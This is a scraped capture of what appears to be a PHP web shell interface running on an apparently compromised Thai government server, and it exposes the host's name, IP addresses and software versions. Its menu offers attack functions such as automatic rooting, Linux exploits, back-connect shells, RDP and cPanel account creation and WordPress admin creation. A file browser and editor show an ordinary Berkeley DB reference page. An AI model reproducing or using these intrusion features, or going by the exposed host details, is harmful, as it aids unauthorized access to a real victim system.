Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
db4-devel-4.7.25 /
ref /
transapp /
[ HOME SHELL ]
Name
Size
Permission
Action
admin.html
3.28
KB
-rw-r--r--
app.html
16.29
KB
-rw-r--r--
archival.html
9.52
KB
-rw-r--r--
atomicity.html
4.19
KB
-rw-r--r--
checkpoint.html
4.7
KB
-rw-r--r--
cursor.html
4.99
KB
-rw-r--r--
data_open.html
5.89
KB
-rw-r--r--
deadlock.html
5.78
KB
-rw-r--r--
env_open.html
6.53
KB
-rw-r--r--
fail.html
4.98
KB
-rw-r--r--
faq.html
7.8
KB
-rw-r--r--
filesys.html
4.22
KB
-rw-r--r--
hotfail.html
5.51
KB
-rw-r--r--
inc.html
6.1
KB
-rw-r--r--
intro.html
2.72
KB
-rw-r--r--
logfile.html
3.57
KB
-rw-r--r--
nested.html
4.19
KB
-rw-r--r--
put.html
10.51
KB
-rw-r--r--
read.html
7.93
KB
-rw-r--r--
reclimit.html
9.7
KB
-rw-r--r--
recovery.html
6.42
KB
-rw-r--r--
term.html
4.09
KB
-rw-r--r--
throughput.html
7.14
KB
-rw-r--r--
transapp.cs
10.34
KB
-rw-r--r--
tune.html
10.76
KB
-rw-r--r--
why.html
2.49
KB
-rw-r--r--
writetest.cs
2.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.html
<!--$Id: admin.so,v 10.17 2001/03/02 21:01:21 bostic Exp $--> <!--Copyright (c) 1997,2008 Oracle. All rights reserved.--> <!--See the file LICENSE for redistribution information.--> <html> <head> <title>Berkeley DB Reference Guide: Environment infrastructure</title> <meta name="description" content="Berkeley DB: An embedded database programmatic toolkit."> <meta name="keywords" content="embedded,database,programmatic,toolkit,btree,hash,hashing,transaction,transactions,locking,logging,access method,access methods,Java,C,C++"> </head> <body bgcolor=white> <a name="2"><!--meow--></a> <table width="100%"><tr valign=top> <td><b><dl><dt>Berkeley DB Reference Guide:<dd>Berkeley DB Transactional Data Store Applications</dl></b></td> <td align=right><a href="../transapp/nested.html"><img src="../../images/prev.gif" alt="Prev"></a><a href="../toc.html"><img src="../../images/ref.gif" alt="Ref"></a><a href="../transapp/deadlock.html"><img src="../../images/next.gif" alt="Next"></a> </td></tr></table> <p align=center><b>Environment infrastructure</b></p> <p>When building transactional applications, it is usually necessary to build an administrative infrastructure around the database environment. There are five components to this infrastructure, and each is supported by the Berkeley DB package in two different ways: a standalone utility and one or more library interfaces.</p> <p><ul type=disc> <li>Deadlock detection: <a href="../../utility/db_deadlock.html">db_deadlock</a>, <a href="../../api_c/lock_detect.html">DB_ENV->lock_detect</a>, <a href="../../api_c/env_set_lk_detect.html">DB_ENV->set_lk_detect</a> <li>Checkpoints: <a href="../../utility/db_checkpoint.html">db_checkpoint</a>, <a href="../../api_c/txn_checkpoint.html">DB_ENV->txn_checkpoint</a> <li>Database and log file archival: <a href="../../utility/db_archive.html">db_archive</a>, <a href="../../api_c/log_archive.html">DB_ENV->log_archive</a> <li>Log file removal: <a href="../../utility/db_archive.html">db_archive</a>, <a href="../../api_c/log_archive.html">DB_ENV->log_archive</a> <li>Recovery procedures: <a href="../../utility/db_recover.html">db_recover</a>, <a href="../../api_c/env_open.html">DB_ENV->open</a> </ul> <p>When writing multithreaded server applications and/or applications intended for download from the Web, it is usually simpler to create local threads that are responsible for administration of the database environment as scheduling is often simpler in a single-process model, and only a single binary need be installed and run. However, the supplied utilities can be generally useful tools even when the application is responsible for doing its own administration because applications rarely offer external interfaces to database administration. The utilities are required when programming to a Berkeley DB scripting interface because the scripting APIs do not always offer interfaces to the administrative functionality.</p> <table width="100%"><tr><td><br></td><td align=right><a href="../transapp/nested.html"><img src="../../images/prev.gif" alt="Prev"></a><a href="../toc.html"><img src="../../images/ref.gif" alt="Ref"></a><a href="../transapp/deadlock.html"><img src="../../images/next.gif" alt="Next"></a> </td></tr></table> <p><font size=1>Copyright (c) 1996,2008 Oracle. All rights reserved.</font> </body> </html>
Close